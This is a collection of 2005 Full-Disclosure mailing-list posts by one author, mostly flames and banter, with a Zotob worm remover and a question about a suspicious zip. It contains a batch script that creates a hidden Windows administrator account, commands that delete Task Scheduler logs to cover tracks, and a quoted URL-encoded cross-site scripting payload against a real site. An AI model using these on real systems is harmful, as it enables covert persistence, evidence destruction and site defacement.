Re: Re[2]: [Full-disclosure] elevating privileges from Admin to SYSTEM
make sure ya clean up :) C:\>net stop "Task Scheduler" C:\>del %SystemRoot%\SchedLgU.Txt C:\>net start "Task Scheduler" - illwill ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Odd My_Photo.zip in email
receiving an odd email with an attached zip file called "My_Photo.zip" containing a .jpg and a .bat that only has execution code of "My Photo.jpg" in it. the .jpg itself looks to be an encrypted vb dll with just the .jpg extention changed .. but im just curious as to how this virus planned on executing itself , ive seen the mydoom virus spreading this way but included something like a .cpl file or a file with a bunch of spaces to hide the extention of .pif etc .. not at home right now to analyze but wondeirng if anyone came across this -- - illwill ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Secure Access or "How to have people download a trojan."
> On 9/21/05, Paul Nickerson <[EMAIL PROTECTED]> wrote: "What's the last security advisory that YOU have come out with?" yea Paul we all dont know how to take 2 pre-existing flaws and mash them together with the help of others to make our so-called 'security advisories' and credit ourselves Need help patting yourself on the back? -- - illwill ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Secure Access or "How to have people download a trojan."
"Not to mention as Microsoft becomes better at everything it does and becomes righteous" Paul -Greyhats Security You have a skewed vision of reality, little guy They must have been stroking you the whole time they invited to their 'bluehat conference' -- - illwill ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] killbits? should have named them kibbles and bits
Background: Killbits are used to block certain activex controls from running within windows It is possible using certain methods to bypass this remotely. This goes out to my favorite company in the whole world Microsoft. Thanks for the upcoming vacation. :) MS security department head (Hi Terry) will stop at nothing to cover that killbit can be bypassed remotely and to keep it a secret from vendors Heres a hint evil browser hax0rs: play around with every different way to instantiate active x objects More to come? hack the planet illwill all your exploits are back to belonging to us ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mozilla Firefox "Host:" Buffer Overflow Exploit
(the most common examples of MS who^H^H^H zealots are: 1. "MS is giving me money, so billg is good") must be Paul's grey hat continues to get whiter by the day , i thought it was just because his mom never taught him not to bleach dark clothes. -illwill ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] talk.google.com
google just released the newest version with downloadable tinfoil hat ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FrSIRT False Alarm
On 8/20/05, Paul <[EMAIL PROTECTED]> wrote: > Not to mention this is hardly even assembly. This is like really ghetto > assembly. In REAL assembly, there would be no ".if" statements. It's all cmp > blah blah, jz, jnz, etc. Lot's more work. Also, there is no such thing as > .invoke MessageBox. Give me a break. In real assembly, that code would be > about 5 times longer. > > Regards, > Paul > Greyhats Security > http://greyhatsecurity.org > Paul is just in a pissing contest because i let the cat out of bag with his firefox sploit a few months back.. also is now mad because microsoft is closely watching this list and i know about his remote activeX killbit bypass that he has 'under his belt' as he claims (yes i know how to start an object other then in http://greyhatsecurity.org ,claims "Paul from Greyhats has become a whitehat. I will still refer to myself as "Paul from Greyhats"; however, I will abide to the ethics of a whitehat. Vendors are our friends, and we need to work with them to protect the customers" it must be nice when people hand u known vulns in the past and now im sure from working with microsoft they had known about this killbit already and your a test monkey now tell bill gates illwill sends his love. http://illmob.org/paul.html -- - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: FrSIRT False Alarm
i made a killbit in 'assembly' too using all type of invokes and .if statements too why would i spend more than the 20 minutes i did on it using jmps jz mov etc .. i'd rather spend my friday night partying.. here's my binary and source http://illmob.org/0day/msdds.dll_deactivator.rar btw their is still ways around this killbit registry mod :D On 8/22/05, Dave Korn <[EMAIL PROTECTED]> wrote: > Original Message > >From: Paul > >Message-Id: [EMAIL PROTECTED] > > > Not to mention this is hardly even assembly. This is like really ghetto > > assembly. In REAL assembly, there would be no ".if" statements. It's all > > cmp blah blah, jz, jnz, etc. Lot's more work. Also, there is no such > > thing as .invoke MessageBox. Give me a break. In real assembly, that code > > would be about 5 times longer. > > Umm, this really just suggests that you aren't aware of the past thirty > years worth of advances in assembler technology. Assemblers have had macro > functionality since as far back as anyone can remember, your claim that a > programmer should write everything out longhand is just ridiculous. It's > like suggesting that nobody should use "#define" in C because it's cheating. > And hey, don't use loops, write the instruction sequence over and over again > by hand. Don't use subroutines either, that's cheating too! Of course, in > my day, we had nothing but front panel switches, and we had to toggle them > with our bare teeth, and father would make us get oop at six o'clock in 't > morning and conduct electricity to computer using our own arms and legs for > power cables > > >cheers, > DaveK > -- > Can't think of a witty .sigline today > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] An old/new security list
thinking security-minded people always backed up their hdds daily :D On 8/22/05, TheGesus <[EMAIL PROTECTED]> wrote: > Gee, Dave, isn't "availability" part of your security program? > > 2nd time this year, dude. > > On 8/22/05, Dave Aitel <[EMAIL PROTECTED]> wrote: > > Immunity suffered a hard drive problem, so if you were on this list: > > http://www.immunitysec.com/mailman/listinfo/dailydave , we invite you to > > resubscribe. We'll be announcing new versions of MOSDEF, SPIKE, SPIKE > > Proxy, and an all new unmidl.py as soon as we get our infrastructure > > ready. (It's easier to make new tarballs than to recover the old ones). > > There will probably also be discussions of Buffy the Vampire slayer, > > hand crafted IDL files for random MS services, lobster farms, flames, > > and the usual lot. > > > > Thanks, > > Dave Aitel > > Immunity, Inc. > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Zotob Worm Remover
problem was most of the laptop users are normally behind a firewall during the work week then go home on dial-up unprotected , then come back to work on monday :) btw vers. 1.1 is done that kills variants H and I .. http://illmob.org/0day/Zotob_Killer1.1.rar -- - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Zotob Worm Remover
Made a Zotob Worm Remover that removes the processes/files/registry entries from variants A through G. includes MASM source code. http://illmob.org/0day/Zotob_Killer.rar - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] hidden users on windows?
old news for XP @echo off @echo HideUserXP.bat @echo by illwill http://illmob.org @echo This will create a hidden user with admin rights in XP @echo ( hidden meaning that the username wont appear in the logon screen) @echo To log on to your hidden account, you need to use the Log On To Windows dialog box by pressing Ctrl + Alt + Delete twice. @echo Make sure you're logged off all accounts. You can't just switch users. net user illwill password /add && net localgroup administrators illwill /add echo Windows Registry Editor Version 5.00> c:\hide.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg echo "illwill"=dword:>> c:\hide.reg REGEDIT /S c:\hide.REG DEL /Q c:\hide.REG attrib +r +a +s +h %SystemDrive%\docume~1\illwill Exit On 8/3/05, nabiy <[EMAIL PROTECTED]> wrote: Hello,A security issue has been identified in current versions of windowsthat allows 'hidden' user accounts. The User Account Manager in the Windows Control Panel and the 'Welcome Screen' both fail to reportinteractive logons made with the netapi. This security issue has beenverified on Windows 2000 Professional, Windows XP Home Edition andWindows XP Professional. Microsoft was notified of this issue on July 28, 2005. The problem is not with the netapi or the ability to createusers but with the User Account Manager in Windows. It simply fails tolist all of the users that are on the system.This issue was noticed while exploring the netapi on windows – users created with the netuseradd function failed to show up in both theUser Account Manager and on the Welcome Screen. The failure to listusers made with the netapi presents a problem for obvious reasons;home users and even administrators expect to see all of the users on their system when using these facilities.The solution in all versions of windows is simple. Do not depend onthe User Account Manager when managing user accounts on your system.Instead, users should use the Local Users and Groups management snapin or the net command from the cli.More information has been documented at http://neworder.box.sknathan aguirre--http://nabiy.sdf1.org . gopher://sdf.lonestar.org/11/users/nabiyThe Super Dimension Fortress Public Access Unix System___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ -- - illwillhttp://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Some VNC doubts : access server behind TCP/IP proxy or gateways
tcpredir,fpipe,bouncerOn 7/5/05, Aditya Deshmukh <[EMAIL PROTECTED] > wrote:Hi List,I have a very peculiar problem about accessing VNC server behind gateways and proxy server...Here is the background info...I have a client who has pretty big vnc installation base mostly windows butLinux and Solaris also includes.Most of the Road Warriors have windows with vnc and ssh installed on them ( mostly winxp sp2 )VNC is used to remote admin or support for some of the road warriors. Butmost of the times when the VNC server is behind a gateway like this it wontconnect.[ Internet ] -- [ Gateway ] --- [ Lan ] The work about is to use the UltraVNC relay service, but if you don't haveany control over the gateway this becomes impossible to operate. And I hateto open ports in the firewalls of the road warriors' computers. Is there a way something like reverse shell that allows someone to connectto a VNC server, behind gateway and through firewalls without opening anyholes in it or a tcp/ip proxy that is proxy that does not allow connections from the internet ?Basically, The user initiates the connection and the helpdesk can use thesame socket to the laptop for connection over VNC ( vnc encryption andcompression have already been taken care of, and only one socket is needed for all this- for a firewall I would require only one hole )Any help would be appreciated - adityaDelivered using the Free Personal Edition of Mailtraq ( www.mailtraq.com)___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Publishing exploit code - what is it good for
I think Edwin Star said it best "Code – Good God Y'all What is it good for? Absolutely nothing" or was it war?-- - illwillhttp://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] COX Internet Outage
i was down pretty much all day ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Micky-dee's anyone?
any way of scripting a free happy meal or somethin?On 5/1/05, [EMAIL PROTECTED] < [EMAIL PROTECTED]> wrote: To all you people that like McDonalds, here is a quick link that may show you the light: http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2 F%73%63%72%69%70%74%3E Interesting, huh? Regards, Pauil ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ -- - illwillhttp://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacked: Who Else Is Using Your Computer?
I think this article should have been posted on some aol mailing list. I'm sorry but it looks like it was written for someone whos never used a computer, or it looks like and ad for av companies. I hope to think half the users on this list didnt find any part of the article informative. -- - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phrack.org - path disclosure
dont you think it would have been better if you just emailed the webmaster instead of cluttering the list with something so fucking stupid On Tue, 8 Mar 2005 22:04:22 +0100, Crg <[EMAIL PROTECTED]> wrote: > http://www.phrack.org/ > > Warning: mysql_connect(): Can't connect to local MySQL server through socket > '/var/run/mysqld/mysqld.sock' (11) in > /var/www/phrack.org/htdocs/.config/phracksql_inc.php on line 106 > > error: mysql_connect() failed > agent: > via: > remote: > forwarded: > url: > Please contact [EMAIL PROTECTED] > > Hey guys! who forgot to add safe_mysqld to init scripts ? > > Also could be nice to disable display_errors :P > > Regards > > /Crg > >"What's stopping you?" > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://www.secunia.com/ > -- - illwill http://illmob.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://www.secunia.com/